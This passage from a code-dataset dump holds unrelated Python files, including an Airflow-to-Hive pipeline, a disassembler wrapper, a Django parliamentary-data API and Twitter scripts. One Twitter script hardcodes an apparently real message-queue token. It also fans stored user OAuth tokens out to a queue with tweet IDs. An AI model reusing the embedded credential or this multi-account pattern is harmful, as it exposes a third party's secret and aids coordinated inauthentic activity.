python_callable=query_data_by_week_end_date_func,\n op_args=['{{ macros.ds_add(ds, -1) }}'],\n dag=dag,\n)\n\n# Remove empty columns\ndef remove_empty_columns_func(ds):\n df = pd.read_csv(f'{DATA_FOLDER}/transaction-{ds}.csv')\n logging.info(df.head())\n df[\n [\n 'WEEK_END_DATE', \n 'STORE_NUM', \n 'UPC', \n 'UNITS', \n 'VISITS', \n 'HHS', \n 'SPEND', \n 'PRICE', \n 'BASE_PRICE', \n 'FEATURE', \n 'DISPLAY', \n 'TPR_ONLY'\n ]\n ].to_csv(f'{DATA_FOLDER}/transaction-cleaned-{ds}.csv', index=False, header=False)\n\n\nremove_empty_columns = PythonOperator(\n task_id='remove_empty_columns',\n python_callable=remove_empty_columns_func,\n op_args=['{{ macros.ds_add(ds, -1) }}'],\n dag=dag,\n)\n\n# Upload to HDFS\nupload_to_hdfs = BashOperator(\n task_id='upload_to_hdfs',\n bash_command=f'hdfs dfs -put -f {DATA_FOLDER}/transaction-cleaned-{{{{ macros.ds_add(ds, -1) }}}}.csv /transaction-cleaned-{{{{ macros.ds_add(ds, -1) }}}}.csv',\n dag=dag,\n)\n\n# Create Hive table with partition\ncreate_transations_table = HiveOperator(\n task_id='create_transations_table',\n hive_cli_conn_id='my_hive_conn',\n hql='''\n CREATE TABLE IF NOT EXISTS fact_transactions (\n week_end_date VARCHAR(40),\n store_num INT,\n upc VARCHAR(100),\n units INT,\n visits INT,\n hhs INT,\n spend DECIMAL(38, 2),\n price DECIMAL(38, 2),\n base_price DECIMAL(38, 2),\n feature INT,\n display INT,\n tpr_only INT\n )\n PARTITIONED BY (execution_date DATE)\n ROW FORMAT DELIMITED FIELDS TERMINATED BY ',' LINES TERMINATED BY '\\n'\n STORED AS TEXTFILE;\n ''',\n dag=dag,\n)\n\n# Load data in Hive table with partition\nload_data_to_hive_table = HiveOperator(\n task_id='load_data_to_hive_table',\n hive_cli_conn_id='my_hive_conn',\n hql='''\n LOAD DATA INPATH '/transaction-cleaned-{{ macros.ds_add(ds, -1) }}.csv' OVERWRITE INTO TABLE fact_transactions PARTITION (execution_date=date'{{ macros.ds_add(ds, -1) }}');\n ''',\n dag=dag,\n)\n\nend = DummyOperator(\n task_id='end',\n dag=dag,\n)\n\n# Define DAG dependencies\nstart >> query_data_by_week_end_date >> remove_empty_columns >> upload_to_hdfs >> create_transations_table >> load_data_to_hive_table >> end\n","sub_path":"mnt/airflow/dags/transaction_load_pipeline.py","file_name":"transaction_load_pipeline.py","file_ext":"py","file_size_in_byte":3781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"517737053","text":"\"\"\"\n@Author: Brandon Miller (riftworm)\n@Email: brandonkentmiller@gmail.com\n\"\"\"\n\nfrom capstone import *\n\nclass ASM():\n def __init__(self, archstr, emstr = None):\n \"\"\"\n Basic constructor\n \"\"\"\n self.proc, self.mode = self._get_arch(archstr)\n if emstr != None:\n self.mode += self._get_extra_mode(emstr)\n\n def _get_arch(self, archstr):\n \"\"\"\n Get disassembler mode from user supplied mode string\n \"\"\"\n if archstr == \"x86\":\n return [CS_ARCH_X86, CS_MODE_32]\n elif archstr == \"x8664\" or archstr == \"x86-64\":\n return [CS_ARCH_X86, CS_MODE_64]\n elif archstr == \"x8616\" or archstr == \"x86-16\":\n return [CS_ARCH_X86, CS_MODE_16]\n elif archstr == \"arm\":\n return [CS_ARCH_ARM, CS_MODE_ARM]\n elif archstr == \"thumb\":\n return [CS_ARCH_ARM, CS_MODE_THUMB]\n elif archstr == \"arm64\" or archstr == \"arm-64\":\n return [CS_ARCH_ARM64, CS_MODE_ARM]\n elif archstr == \"mips\":\n return [CS_ARCH_MIPS, CS_MODE_MIPS32]\n elif archstr == \"mips64\":\n return [CS_ARCH_MIPS, CS_MODE_MIPS64]\n elif archstr == \"mipsr6\" or archstr == \"mips32r6\":\n return [CS_ARCH_MIPS, CS_MODE_MIPS32R6]\n elif archstr == 
\"ppc\":\n            return [CS_ARCH_PPC, CS_MODE_32]\n        elif archstr == \"ppc64\" or archstr == \"ppc-64\":\n            return [CS_ARCH_PPC, CS_MODE_64]\n        else:\n            return [None, None]\n\n    def _get_extra_mode(self, emstr):\n        \"\"\"\n        Get extra mode specifier from supplied string\n        \"\"\"\n        if emstr == \"le\" or emstr == \"little\":\n            return CS_MODE_LITTLE_ENDIAN\n        elif emstr == \"be\" or emstr == \"big\":\n            return CS_MODE_BIG_ENDIAN\n        elif emstr == \"micro\":\n            return CS_MODE_MICRO\n        elif emstr == \"mclass\":\n            return CS_MODE_MCLASS\n        elif emstr == \"v8\":\n            return CS_MODE_V8\n        else:\n            raise Exception('Unknown Extra Mode', 'invalid extra mode string supplied')\n\n    def disasm(self, buf, offset = 0x00):\n        \"\"\"\n        Disassembles a buffer of data based on supplied architecture\n        \"\"\"\n        md = Cs(self.proc, self.mode)\n        for (address, size, mnemonic, opstr) in md.disasm_lite(buf, offset):\n            print(\"0x{0}:\\t{1}\\t{2}\".format(address, mnemonic, opstr))\n","sub_path":"talon/asm.py","file_name":"asm.py","file_ext":"py","file_size_in_byte":2407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"16754654","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat May 25 11:08:55 2019\r\n\r\n@author: user\r\n\"\"\"\r\n\r\n# exception handling is important\r\n# standard suspects are div by zero, io error\r\ntry:\r\n    x = 1\r\n    y = 0\r\n    x/y\r\nexcept ZeroDivisionError:\r\n    print(\"Divide by Zero ! Huh\")\r\n# What do you get when you try to add Srini to a complex number\r\n# type error of course, because Srini is not a complex guy\r\nx = \"Jamie\"\r\ntry:\r\n    y = 2 + 2j\r\n    p = x + y\r\n    #print(p)\r\nexcept TypeError:\r\n    print(\"mismatch in your type\")\r\n# and an exception to catch all situations\r\ntry:\r\n    x = \"Marie\"\r\n    y = 2 + 2j\r\n    x/y\r\n    print(\"hello world\")\r\nexcept ZeroDivisionError:\r\n    print(\"Divide by Zero ! Huh\")\r\nexcept:\r\n    print(\"Will catch all other errors\")\r\nfinally:\r\n    print(\"Will execute no matter what\")\r\n# Exercise try and find the type of error that happens programmatically\r\n# example x=\"rama\" y=\"zero\" and x/y , print the error\r\n# This is a type error because Allah/Rama/Christ can never be Zero\r\ntry:\r\n    x=\"Rama\"\r\n    y=\"Zero\"\r\n    x/y\r\nexcept Exception as ex:\r\n    print(type(ex).__name__)\r\n    template = \"An exception of type {0} occurred. Arguments:\\n{1!r}\"\r\n    message = template.format(type(ex).__name__, ex.args)\r\n    print(message)\r\n# how can we raise exceptions programmatically and defining custom exceptions\r\n# I can define my own custom exceptions\r\n# By inheriting a class of type exception\r\nclass CustomException(Exception):\r\n    def __init__(self, value):\r\n        self.parameter = value\r\n    def __str__(self):\r\n        # repr only does a string representation of the object\r\n        return repr(self.parameter)\r\ntry:\r\n    raise CustomException(\"My Useful Error Message\")\r\nexcept CustomException as ex :\r\n    print(type(ex).__name__)\r\n    template = \"An exception of type {0} occurred. Arguments:\\n{1!r}\"\r\n    message = template.format(type(ex).__name__, ex.args)\r\n    print(message)\r\n    print (\"Caught: custom exception\")\r\n# Shop closed ... 
the show is still to come \r\n\r\n","sub_path":"day1/d1p3.py","file_name":"d1p3.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"440841549","text":"from django.db import models\nfrom tastypie.authentication import ApiKeyAuthentication\nfrom tastypie.authorization import Authorization,DjangoAuthorization\nfrom accounts.models import MyProfile\nfrom django.contrib.auth.models import User\nfrom tastypie.resources import ModelResource\n\nclass UserResource(ModelResource):\n    class Meta:\n        queryset = User.objects.all()\n        resource_name= 'user_info'\n        list_allowed_methods = ['get', 'post']\n        fields = ['email','first_name','last_name']\n        include_resource_uri = False\n        #excludes = ['email', 'password', 'is_active', 'is_staff', 'is_superuser']\n        authentication = ApiKeyAuthentication()\n        authorization = DjangoAuthorization()\n        filtering = {\n            'username':[ 'exact', ]\n        }\n\n    def authorized_read_list(self, object_list, bundle):\n        return object_list.filter(username=bundle.request.user)\n","sub_path":"accounts/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"600358855","text":"# COMMAND LINE APP TO SCRAPE TWITTER TWEETS\n\nimport json\nimport logging\nimport tweepy\nimport argparse\nimport collections\nimport datetime as dt\nfrom os.path import isfile\nfrom twitterscraper.query import query_tweets\n\n\ndef getKeys():\n    file = open(\"twitterkey.txt\",\"r\") #opens key for Twitter API\n    consumerKey = file.readline().rstrip(\"\\n\")\n    consumerSecret = file.readline().rstrip(\"\\n\")\n    accessToken = file.readline().rstrip(\"\\n\")\n    accessTokenSecret = file.readline().rstrip(\"\\n\")\n    #reads file to get assigned values\n    file.close()\n    return consumerKey,consumerSecret,accessToken,accessTokenSecret\n\nclass TwitterAPI():\n    # Initiating info for Twitter API\n    def __init__(self):\n\n        self.consumerKey,self.consumerSecret,self.accessToken,self.accessTokenSecret = getKeys()\n\n        auth = tweepy.OAuthHandler(self.consumerKey, self.consumerSecret)\n        auth.set_access_token(self.accessToken,self.accessTokenSecret)\n        self.api = tweepy.API(auth)\n\n    # Call this with a query to get results\n\n    def getTweets(self,query):\n        tweets = self.api.search(q=query,count = 10,show_user = True,include_entities=True)\n        users = []\n        print (tweets)\n        for tweet in tweets:\n\n            #creates array and adds search info to it\n\n            user = []\n            user.append(tweet.user.name)\n            user.append(tweet.user.screen_name)\n            user.append(tweet.created_at)\n            user.append(tweet.text)\n            users.append(user)\n\n        return users\n\nclass JSONEncoder(json.JSONEncoder):\n    def default(self, obj):\n        if hasattr(obj, '__json__'):\n            return obj.__json__()\n        elif isinstance(obj, collections.Iterable):\n            return list(obj)\n        elif isinstance(obj, dt.datetime):\n            return obj.isoformat()\n        elif hasattr(obj, '__getitem__') and hasattr(obj, 'keys'):\n            return dict(obj)\n        elif hasattr(obj, '__dict__'):\n            return {member: getattr(obj, member)\n                    for member in dir(obj)\n                    if not member.startswith('_') and\n                    not hasattr(getattr(obj, member), '__call__')}\n\n        return json.JSONEncoder.default(self, obj)\n\n# Date format validation\n\ndef valid_date(s):\n    try:\n        return dt.datetime.strptime(s, \"%Y-%m-%d\").date()\n    except ValueError:\n        msg = \"Not a valid date: '{0}'.\".format(s)\n        raise argparse.ArgumentTypeError(msg)\n\ndef main():\n    logging.basicConfig(format='%(levelname)s: 
%(message)s', level=logging.INFO)\n    try:\n        parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter,\n            description=__doc__\n        )\n\n        parser.add_argument(\"query\", type=str)\n        parser.add_argument(\"-o\", \"--output\", type=str, default=\"tweets.json\")\n        parser.add_argument(\"-l\", \"--limit\", type=int, default=None)\n        parser.add_argument(\"-a\", \"--all\", action='store_true')\n        parser.add_argument(\"--lang\", type=str, default=None)\n        parser.add_argument(\"-d\", \"--dump\", action=\"store_true\")\n        parser.add_argument(\"-p\", \"--poolsize\", type=int, default=20) # number of parallel query processes\n        parser.add_argument(\"-bd\", \"--begindate\", type=valid_date, default=\"2017-01-01\", metavar='\\b')\n        parser.add_argument(\"-ed\", \"--enddate\", type=valid_date, default=dt.date.today(), metavar='\\b')\n        #adds information for collection \n        args = parser.parse_args()\n\n        if isfile(args.output) and not args.dump:\n            logging.error(\"Output file exists. Aborting!\")\n            exit(-1)\n        \n        if args.all:\n            args.begindate = dt.date(2007,3,1)\n\n        tweets = query_tweets(query = args.query, limit = args.limit, \n                              begindate = args.begindate, enddate = args.enddate, \n                              poolsize = args.poolsize, lang = args.lang)\n\n        if args.dump:\n            print(json.dumps(tweets, cls=JSONEncoder))\n        else:\n            if tweets:\n                with open(args.output, \"w\") as output:\n                    json.dump(tweets, output, cls=JSONEncoder)\n    except KeyboardInterrupt:\n        logging.info(\"Program interrupted by user. Quitting...\")\n","sub_path":"twitterapi.py","file_name":"twitterapi.py","file_ext":"py","file_size_in_byte":4099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"288494462","text":"from models import Tweets\nfrom models import RawTokens\nfrom cnf import *\nfrom iron_mq import *\nimport json\nimport tweepy\n\n\nusers = []\nironmq = IronMQ(host='mq-aws-eu-west-1-1.iron.io',\n                project_id='5763516ab7409e00071268bd',\n                token='_ppJdHd8vlrK9ZsUC4RmoxmoFow',\n                protocol='https', port=443,\n                api_version=3,\n                config_file=None)\n\nq = ironmq.queue('tweets')\nusers = []\n\nfor token in RawTokens.select():\n    users.append({\"client\": token.client, \"secret\": token.secret})\n\n\n\n# lastTweet = Tweets.select().order_by(Tweets.id.desc()).get().tid\n\n\nauth = tweepy.OAuthHandler(CONSUMER_TOKEN, CONSUMER_SECRET)\nauth.set_access_token(users[0]['client'], users[0]['secret'])\napi = tweepy.API(auth)\n\nfor update in api.user_timeline(screen_name=FOLLOW_USER,count=5):\n    try:\n        print(update.id)\n        tw = Tweets(tid=update.id,send=\"false\")\n        tw.save()\n    except Exception as e:\n        print(e)\n\nfor update in api.user_timeline(screen_name=\"mariainesandra\",count=5):\n    try:\n        print(update.id)\n        tw = Tweets(tid=update.id,send=\"false\")\n        tw.save()\n    except Exception as e:\n        print(e)\n\n\n\nfor twe in Tweets.select().where(Tweets.send == 'false'):\n    for usr in users:\n        q.post(json.dumps({\"client\": usr['client'], \"secret\": usr['secret'], \"tweet\": twe.tid}))\n    twe.send=\"true\"\n    twe.save()\n\n\n","sub_path":"twitter.py","file_name":"twitter.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"380552316","text":"# -*- coding: UTF-8 -*-\nfrom django.conf.urls import url, include\nfrom django.shortcuts import get_object_or_404\nfrom op_scraper.models import *\nfrom rest_framework import routers, serializers, viewsets\nfrom rest_framework.pagination import LimitOffsetPagination\nfrom rest_framework.response import Response\n\n##################\n#  Base Classes  #\n##################\n\n\nclass 
LargeResultsSetPagination(LimitOffsetPagination):\n default_limit = 100\n max_limit = 200\n\n\nclass ESViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"\n A simple ViewSet for listing or retrieving users.\n \"\"\"\n model = None\n serializer = None\n pagination_class = LargeResultsSetPagination\n\n def list(self, request):\n limit = int(request.GET['limit']) if 'limit' in request.GET else 100\n offset = int(request.GET['offset']) if 'offset' in request.GET else 0\n\n lower = offset\n upper = offset + limit\n\n from haystack.query import SearchQuerySet\n\n # Create new queryset\n qs = SearchQuerySet()\n qs = qs.models(self.model)\n result_list = []\n\n for sr in qs.values(*self.fields)[lower:upper]:\n result_list.append(sr)\n\n self.paginate_queryset(result_list)\n self.paginator.count = qs.count()\n self.paginator.display_page_controls = True\n\n return self.get_paginated_response(result_list)\n\n # return Response(result_list)\n\n def retrieve(self, request, pk=None):\n queryset = self.model.objects.all()\n obj = get_object_or_404(queryset, pk=pk)\n serializer = self.serializer(obj, context={'request': request})\n return Response(serializer.data)\n\n\nclass DynamicFieldsModelSerializer(serializers.HyperlinkedModelSerializer):\n \"\"\"\n A ModelSerializer that takes an additional `fields` argument that\n controls which fields should be displayed.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n # Don't pass the 'fields' arg up to the superclass\n fields = kwargs.pop('fields', None)\n\n # Instantiate the superclass normally\n super(DynamicFieldsModelSerializer, self).__init__(*args, **kwargs)\n\n if fields is not None:\n # Drop any fields that are not specified in the `fields` argument.\n allowed = set(fields)\n existing = set(self.fields.keys())\n for field_name in existing - allowed:\n self.fields.pop(field_name)\n\n####################################\n# Model Serializers and Viewsets #\n####################################\n\n### Auxiliary, non primary models\n###\n### These aren't loaded through ES since we don't have them indexed there\n\n\nclass CategorySerializer(DynamicFieldsModelSerializer):\n class Meta:\n model = Category\n fields = ('pk', 'title')\n\nclass CategoryViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"\n Return a list of all categories.\n \"\"\"\n model = Category\n queryset = Category.objects.all()\n serializer_class = CategorySerializer\n\nclass KeywordSerializer(DynamicFieldsModelSerializer):\n class Meta:\n model = Keyword\n fields = ('pk', 'title')\n\nclass KeywordViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"\n Return a list of all keywords.\n \"\"\"\n model = Keyword\n queryset = Keyword.objects.all()\n serializer_class = KeywordSerializer\n\n\nclass LegislativePeriodSerializer(DynamicFieldsModelSerializer):\n class Meta:\n model = LegislativePeriod\n fields = ('pk', 'roman_numeral', 'number', 'start_date', 'end_date')\n\n\nclass LegislativePeriodViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"\n Return a list of all legislative periods.\n\n Phases group law steps.\n \"\"\"\n model = LegislativePeriod\n queryset = LegislativePeriod.objects.all()\n serializer_class = LegislativePeriodSerializer\n\n\nclass DocumentSerializer(DynamicFieldsModelSerializer):\n class Meta:\n model = Document\n fields = ('pk', 'title', 'pdf_link', 'html_link', 'stripped_html')\n\n\nclass DocumentViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"\n Return a list of all documents.\n \"\"\"\n model = Document\n queryset = Document.objects.all()\n serializer_class = 
DocumentSerializer\n\n\nclass FunctionSerializer(DynamicFieldsModelSerializer):\n class Meta:\n model = Function\n fields = ('pk', 'title', 'short')\n\n\nclass FunctionViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"\n Return a list of all political functions that persons can have in the form\n of mandates.\n \"\"\"\n model = Function\n queryset = Function.objects.all()\n serializer_class = FunctionSerializer\n\n\nclass PartySerializer(DynamicFieldsModelSerializer):\n class Meta:\n model = Party\n fields = ('pk', 'short', 'titles')\n\n\nclass PartyViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"\n Return a list of all parties, including their different names at different\n times.\n \"\"\"\n model = Party\n queryset = Party.objects.all()\n serializer_class = PartySerializer\n\n\nclass StateSerializer(DynamicFieldsModelSerializer):\n class Meta:\n model = State\n fields = ('pk', 'name', 'title')\n\n\nclass StateViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"\n Return a list of all states or electoral districts\n \"\"\"\n model = State\n queryset = State.objects.all()\n serializer_class = StateSerializer\n\n\nclass AdministrationSerializer(DynamicFieldsModelSerializer):\n class Meta:\n model = Administration\n fields = ('pk', 'title', 'start_date', 'end_date')\n\n\nclass AdministrationViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"\n Return a list of all administrations since the second republic.\n \"\"\"\n model = Administration\n queryset = Administration.objects.all()\n serializer_class = AdministrationSerializer\n\nclass DebateStatementSerializer(DynamicFieldsModelSerializer):\n debate_id = serializers.IntegerField(read_only=True)\n class Meta:\n model = DebateStatement\n fields = (\n 'pk',\n 'date',\n 'date_end',\n 'index',\n 'doc_section',\n 'text_type',\n 'speaker_role',\n 'page_start',\n 'page_end',\n 'time_start',\n 'time_end',\n 'full_text',\n 'raw_text',\n 'annotated_text',\n 'speaker_name',\n 'debate_id'\n )\n\n\nclass DebateStatementViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"\n Return a list of all debate statements.\n \"\"\"\n model = DebateStatement\n queryset = DebateStatement.objects.all()\n serializer_class = DebateStatementSerializer\n\nclass DebateSerializer(DynamicFieldsModelSerializer):\n llp = LegislativePeriodSerializer(\n required=True, fields=('pk', 'roman_numeral', 'number'))\n debate_statements = DebateStatementSerializer(required=False, many=True)\n\n class Meta:\n model = Debate\n fields = (\n 'pk',\n 'date',\n 'title',\n 'debate_type',\n 'protocol_url',\n 'detail_url',\n 'nr',\n 'llp',\n 'debate_statements',\n )\n\nclass DebateViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"\n Return a list of all debates, with their debate statements, where existing.\n \"\"\"\n model = Debate\n queryset = Debate.objects.all()\n serializer_class = DebateSerializer\n\nclass MandateSerializer(DynamicFieldsModelSerializer):\n function = FunctionSerializer()\n party = PartySerializer(fields=('pk', 'short'))\n legislative_period = LegislativePeriodSerializer(\n required=True, fields=('pk', 'roman_numeral', 'number'))\n state = StateSerializer()\n administration = AdministrationSerializer()\n\n class Meta:\n model = Mandate\n fields = (\n 'pk',\n 'function',\n 'start_date',\n 'end_date',\n 'party',\n 'legislative_period',\n 'state',\n 'administration'\n )\n\n\nclass MandateViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"\n Return a list of all mandates.\n\n A mandate is a persons function, delimited with a start- and end-date.\n \"\"\"\n model = Mandate\n queryset = 
Mandate.objects.all()\n serializer_class = MandateSerializer\n pagination_class = LargeResultsSetPagination\n\nclass PhaseSerializer(DynamicFieldsModelSerializer):\n\n class Meta:\n model = Phase\n fields = (\n 'pk',\n 'title'\n )\n\nclass PhaseViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"\n Return a list of all phases.\n\n Phases group law steps.\n \"\"\"\n model = Phase\n queryset = Phase.objects.all()\n serializer_class = PhaseSerializer\n\nclass StepSerializer(DynamicFieldsModelSerializer):\n\n phase = PhaseSerializer(required=False)\n\n class Meta:\n model = Step\n fields = (\n 'pk',\n 'title',\n 'date',\n 'sortkey',\n 'protocol_url',\n 'source_link',\n 'phase'\n )\n\n\nclass StepViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"\n Return a list of all steps.\n\n Laws undergo steps as they move through the legislative process.\n Each step is part of one phase.\n \"\"\"\n model = Step\n queryset = Step.objects.all()\n serializer_class = StepSerializer\n\nclass EntitySerializer(DynamicFieldsModelSerializer):\n\n class Meta:\n model = Entity\n fields = (\n 'pk',\n 'title',\n 'title_detail',\n 'email',\n 'phone')\n\n\nclass EntityViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"\n Return a list of all entities.\n\n An entity is a person or organisation that has at some point given an\n opinion (Stellungnahme) about a propsed law.\n \"\"\"\n model = Entity\n queryset = Entity.objects.all()\n serializer_class = EntitySerializer\n\nclass OpinionSerializer(DynamicFieldsModelSerializer):\n\n documents = DocumentSerializer(required=False, many=True)\n category = CategorySerializer(required=False)\n keywords = KeywordSerializer(required=False, many=True)\n entity = EntitySerializer()\n\n class Meta:\n model = Opinion\n fields = (\n 'pk',\n 'parl_id',\n 'date',\n 'description',\n 'source_link',\n 'documents',\n 'category',\n 'keywords',\n 'entity',\n )\n\nclass OpinionViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"\n Return a list of all opinions ('Stellungnahmen') for Pre-Laws (Ministerialentwürfe, etc.)\n \"\"\"\n model = Opinion\n queryset = Opinion.objects.all()\n serializer_class = OpinionSerializer\n\n### Primary Models Person, Law and Debaite\n###\n### ViewSet loads the result content through ES instead of through the DjangoDB\n\nclass LawSerializer(DynamicFieldsModelSerializer):\n category = CategorySerializer(required=False)\n keywords = KeywordSerializer(required=False, many=True)\n legislative_period = LegislativePeriodSerializer(\n required=True, fields=('pk', 'roman_numeral', 'number'))\n documents = DocumentSerializer(required=False, many=True)\n references_id = serializers.IntegerField(read_only=True)\n slug = serializers.CharField(read_only=True)\n steps = StepSerializer(required=False, many=True)\n opinions = OpinionSerializer(required=False, many=True)\n\n class Meta:\n model = Law\n fields = (\n 'title',\n 'status',\n 'source_link',\n 'parl_id',\n 'description',\n 'category',\n 'keywords',\n 'legislative_period',\n 'documents',\n 'references_id',\n 'slug',\n 'steps',\n 'opinions',\n )\n\n\nclass LawViewSet(ESViewSet):\n \"\"\"\n Return a list of all laws.\n \"\"\"\n model = Law\n queryset = Law.objects.all()\n serializer = LawSerializer\n fields = (\n 'title',\n 'status',\n 'source_link',\n 'parl_id',\n 'pk',\n 'llps',\n 'llps_numeric',\n 'keywords',\n 'category',\n 'ts',\n 'internal_link')\n\n\nclass PersonSerializer(DynamicFieldsModelSerializer):\n \"\"\"\n Serializer class for Person object.\n \"\"\"\n\n mandates = MandateSerializer(\n many=True\n #,fields=('pk',)\n )\n 
latest_mandate = MandateSerializer()\n    debate_statements = DebateStatementSerializer(many=True)\n\n    class Meta:\n        model = Person\n        fields = (\n            'parl_id',\n            'source_link',\n            'photo_link',\n            'photo_copyright',\n            'full_name',\n            'reversed_name',\n            'birthdate',\n            'birthplace',\n            'deathdate',\n            'deathplace',\n            'occupation',\n            '_slug',\n            'mandates',\n            'latest_mandate',\n            'debate_statements'\n        )\n\n\nclass PersonViewSet(ESViewSet):\n    \"\"\"\n    Return a list of all persons.\n    \"\"\"\n    model = Person\n    queryset = Person.objects.all()\n    serializer = PersonSerializer\n    fields = (\n        'parl_id',\n        'full_name',\n        'birthdate',\n        'birthplace',\n        'occupation',\n        'ts',\n        'deathdate',\n        'deathplace',\n        'party',\n        'llps',\n        'llps_numeric')\n\n\n# Routers provide an easy way of automatically determining the URL conf.\nrouter = routers.DefaultRouter()\nrouter.register(r'persons', PersonViewSet, base_name=\"Person\")\nrouter.register(r'laws', LawViewSet, base_name=\"Law\")\nrouter.register(r'debates', DebateViewSet, base_name=\"Debate\")\n\nrouter.register(r'categories', CategoryViewSet, base_name=\"Category\")\nrouter.register(r'keywords', KeywordViewSet, base_name=\"Keyword\")\nrouter.register(r'phases', PhaseViewSet, base_name=\"Phase\")\nrouter.register(r'steps', StepViewSet, base_name=\"Step\")\nrouter.register(r'entities', EntityViewSet, base_name=\"Entity\")\nrouter.register(r'opinions', OpinionViewSet, base_name=\"Opinion\")\nrouter.register(r'documents', DocumentViewSet, base_name=\"Document\")\nrouter.register(r'functions', FunctionViewSet, base_name=\"Function\")\nrouter.register(r'mandates', MandateViewSet, base_name=\"Mandate\")\nrouter.register(r'parties', PartyViewSet, base_name=\"Party\")\nrouter.register(r'state', StateViewSet, base_name=\"State\")\nrouter.register(r'administration', AdministrationViewSet,\n                base_name=\"Administration\")\nrouter.register(r'legislative_periods', LegislativePeriodViewSet,\n                base_name=\"LegislativePeriod\")\nrouter.register(r'debate_statements', DebateStatementViewSet,\n                base_name=\"DebateStatement\")\n","sub_path":"offenesparlament/offenesparlament/views/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":14607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"589739251","text":"import functions as f\nfrom scipy.interpolate import griddata, RegularGridInterpolator\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom time import gmtime\nimport matplotlib\nmatplotlib.rcParams['lines.linewidth']=1\nmatplotlib.rcParams['text.usetex']=True\nmatplotlib.rcParams['mathtext.fontset'] = 'cm'\nplt.rc('font', **{'family': 'serif', 'serif': ['cmr10']})\ntitlefont = {'fontsize':10}\nlabelfont = {'fontsize':10}\ntickfont = {'fontsize':8}\nplt.close('all')\nticks = [13,14,15,16,17]\nxmin=12\nxmax=16\nymin=-288\nymax=72\nFigSize=(6,3)#6*9/16)\nplt.figure(1,figsize=FigSize)\nproj_center_lat = 37.8\nproj_center_lon = -106.15\nground2 = [-106.03917,37.781644]\nground4 = [-106.041412,37.782097]\nground5 = [-106.041504,37.782005]\n\nF = np.load('point_s1_07-17.npz')\npoint_pos = F['pos']\npoint_s1 = 3600*F['s1']\npoint_time = F['time']\nF.close()\n\nground = ground5\nross_lon = np.mean([-106.04076,-106.040763,-106.040762,-106.040762])\nross_lat = np.mean([37.780287,37.780307,37.780398,37.780338])\nschmale_lon = np.mean([-106.0422848,-106.0422905,-106.0422956,-106.0422941])\nschmale_lat = np.mean([37.78153018,37.78155617,37.78156052,37.78156436])\n#(ross, schmale)\npaired_flights = 
[(22,9),(23,10),(25,11),(26,12)]\n\nground_m = f.lonlat2m(proj_center_lon,proj_center_lat,ground[0],ground[1])\nross_pos_m = f.lonlat2m(proj_center_lon,proj_center_lat,ross_lon,ross_lat)\nschmale_pos_m = f.lonlat2m(proj_center_lon,proj_center_lat,schmale_lon,schmale_lat)\ndx = ground_m[0] - schmale_pos_m[0]\ndy = ground_m[1] - schmale_pos_m[1]\n\ns1=[]\nplt_sec=[]\nfor i, pair in enumerate(paired_flights):\n plt_sec_temp = []\n s1_temp = []\n \n ross_data = pd.read_csv('Ross{:d}_DroneMetData.txt'.format(pair[0]), delim_whitespace=True,header=1,names=['date','time','wind_speed','wind_dir','temp'])\n seconds = []\n for t in range(ross_data.shape[0]):\n hrs_in_sec = int(ross_data['time'][t][0:2])*3600\n min_in_sec = int(ross_data['time'][t][3:5])*60\n sec = int(ross_data['time'][t][6:8])\n seconds.append(hrs_in_sec+min_in_sec+sec)\n ross_data['time'] = seconds\n \n schmale_data = pd.read_csv('Schmale{:d}_DroneMetData.txt'.format(pair[1]), delim_whitespace=True,header=1,names=['date','time','wind_speed','wind_dir','temp'])\n seconds = []\n for t in range(schmale_data.shape[0]):\n hrs_in_sec = int(schmale_data['time'][t][0:2])*3600\n min_in_sec = int(schmale_data['time'][t][3:5])*60\n sec = int(schmale_data['time'][t][6:8])\n seconds.append(hrs_in_sec+min_in_sec+sec)\n schmale_data['time'] = seconds\n\n ground_data = pd.read_csv('Ground5_MetData.txt', delim_whitespace=True,header=1,names=['date','time','wind_speed','wind_dir','temp'])\n seconds = []\n for t in range(ground_data.shape[0]):\n hrs_in_sec = int(ground_data['time'][t][0:2])*3600\n min_in_sec = int(ground_data['time'][t][3:5])*60\n sec = int(ground_data['time'][t][6:8])\n seconds.append(hrs_in_sec+min_in_sec+sec)\n ground_data['time'] = seconds\n \n min_time = max([ross_data['time'].min(),schmale_data['time'].min(),ground_data['time'].min()])\n max_time = min([ross_data['time'].max(),schmale_data['time'].max(),ground_data['time'].max()])\n \n if min_time>max_time:\n print('NO!')\n break\n ross_data=ross_data[min_time<=ross_data['time']]\n ross_data=ross_data[ross_data['time']<=max_time]\n \n schmale_data=schmale_data[min_time<=schmale_data['time']]\n 